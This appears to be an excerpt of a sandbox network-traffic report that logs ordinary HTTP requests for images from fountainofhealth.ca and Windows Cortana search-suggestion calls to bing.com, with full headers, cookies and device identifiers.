Source: global traffic	HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2024-05/Group%209823_0.png?itok=DMkwTIJn HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/doctor-21.jpg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/wellness-app.gif HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2024-05/Group%209823_0.png?itok=DMkwTIJn HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/FOH%20-%20Favicon.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175cookie: cf_clearance=nwMdTichHLyc1hDR_KxKvN5K_zSRnilKdMEN9mc42aA-1748893182-1.2.1.1-GfsUnjmrMmLy4SS91FULS49Fc6m6GSkQkyY2Wcjv3BABA3SDoCPqYvCJPqM7vw.wHNh4fSiTSq3OrdaOjsJmjdIa8DuqJXhq5aQaAhu2sG8OJExXyoauQ_N_OUNtqd0l.v2s9lDQ4PYHfTL0rGirMaogtmOW7N1OYKEZUgd1bR_U0OLdg.qkgkPpNJVqAG.sg9C2WW8JTiOAO0xbyxrV5AQJ1cs4IoDKhWHcNUqYLN907SiY1dQqLDwIRK9ikciOjX2Lmc6lFs67rE8XvuvG5l7tlofCfzm4TnXWNeSSiH28ddr5vQEdjH7FwBuuJOSpS6Z_7fcQhbAxSE0qjZ7SJtvgII_xw4H6a9p.UbLowTspriority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-11/Group%209826%20%281%29.png?itok=xYH_8dLj HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175cookie: cf_clearance=nwMdTichHLyc1hDR_KxKvN5K_zSRnilKdMEN9mc42aA-1748893182-1.2.1.1-GfsUnjmrMmLy4SS91FULS49Fc6m6GSkQkyY2Wcjv3BABA3SDoCPqYvCJPqM7vw.wHNh4fSiTSq3OrdaOjsJmjdIa8DuqJXhq5aQaAhu2sG8OJExXyoauQ_N_OUNtqd0l.v2s9lDQ4PYHfTL0rGirMaogtmOW7N1OYKEZUgd1bR_U0OLdg.qkgkPpNJVqAG.sg9C2WW8JTiOAO0xbyxrV5AQJ1cs4IoDKhWHcNUqYLN907SiY1dQqLDwIRK9ikciOjX2Lmc6lFs67rE8XvuvG5l7tlofCfzm4TnXWNeSSiH28ddr5vQEdjH7FwBuuJOSpS6Z_7fcQhbAxSE0qjZ7SJtvgII_xw4H6a9p.UbLowTspriority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/FOH%20-%20Favicon.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29.png?itok=vf0UJVIa HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175cookie: cf_clearance=nwMdTichHLyc1hDR_KxKvN5K_zSRnilKdMEN9mc42aA-1748893182-1.2.1.1-GfsUnjmrMmLy4SS91FULS49Fc6m6GSkQkyY2Wcjv3BABA3SDoCPqYvCJPqM7vw.wHNh4fSiTSq3OrdaOjsJmjdIa8DuqJXhq5aQaAhu2sG8OJExXyoauQ_N_OUNtqd0l.v2s9lDQ4PYHfTL0rGirMaogtmOW7N1OYKEZUgd1bR_U0OLdg.qkgkPpNJVqAG.sg9C2WW8JTiOAO0xbyxrV5AQJ1cs4IoDKhWHcNUqYLN907SiY1dQqLDwIRK9ikciOjX2Lmc6lFs67rE8XvuvG5l7tlofCfzm4TnXWNeSSiH28ddr5vQEdjH7FwBuuJOSpS6Z_7fcQhbAxSE0qjZ7SJtvgII_xw4H6a9p.UbLowTspriority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-11/Group%209826%20%281%29.png?itok=xYH_8dLj HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29.png?itok=vf0UJVIa HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=2f3777f7&IPMID=1741339061431&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Init HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=o&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=0a7fb7675443474b93e6e79ff4d6eb08 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-se
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=on&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=684fe7139df74817b053fa7d309b3c6b HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-s
Source: global traffic	HTTP traffic detected: GET /rb/16/jnc,nj/-M-8YWX0KlEtdAHVrkTvKQHOghs.js?bu=DicweowBkwGWAYkBggGGAcEBxAEwuQHHAQ&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/FgBbpIj0thGWZOh_xFnM9i4O7ek.css?bu=C6oL0gTfBfwL4wrNCsAIaWlpaQ&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/tUCiVcVWZ-go7BLlq95YW6bKHZE.css?bu=B-IDUc4DvQJpae0D&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/3D/ortl,cc,nc/AptopUBu7_oVDubJxwvaIprW-lI.css?bu=A4gCjAKPAg&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=ons&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=922546595914451b8005161047e609ff HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-
Source: global traffic	HTTP traffic detected: GET /rb/6i/cir3,ortl,cc,nc/ZSlq2MSN0MvVwI58OcghaoHmrE4.css?bu=M-oK4wrwCuMK1AvjCtoL4wrjCuMK5QvjCuwL4wryC-MK-AvjCv4L4wqCC-MKiAvjCvwK4wrjCssL4wqXC-MKnQvjCpEL4wrjCq0LsAvjCuMKyAu2C-MKvAu_C-MKqgzjCoQM4wrlDA&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=onsc&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=4&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=41ddb61898e64595a74bb49d95e07614 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx
Source: global traffic	HTTP traffic detected: GET /rb/6i/ortl,cc,nc/NajusmjIqB4kdLn9FmVxeS4xi2o.css?bu=CdIM4wrjCuMK4wrjCuMK4wrjCg&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /th?id=OSK.7196ec0930733746a8b3b2917d333ff0&w=80&h=80&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5accept-language: en-CHaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rp/-iNIzuEypRdgRJ6xnyVHizZ3bpM.br.js HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Mon, 14 Oct 2024 19:26:35 GMTif-none-match: 0x8DCEC861E0B768Ecookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
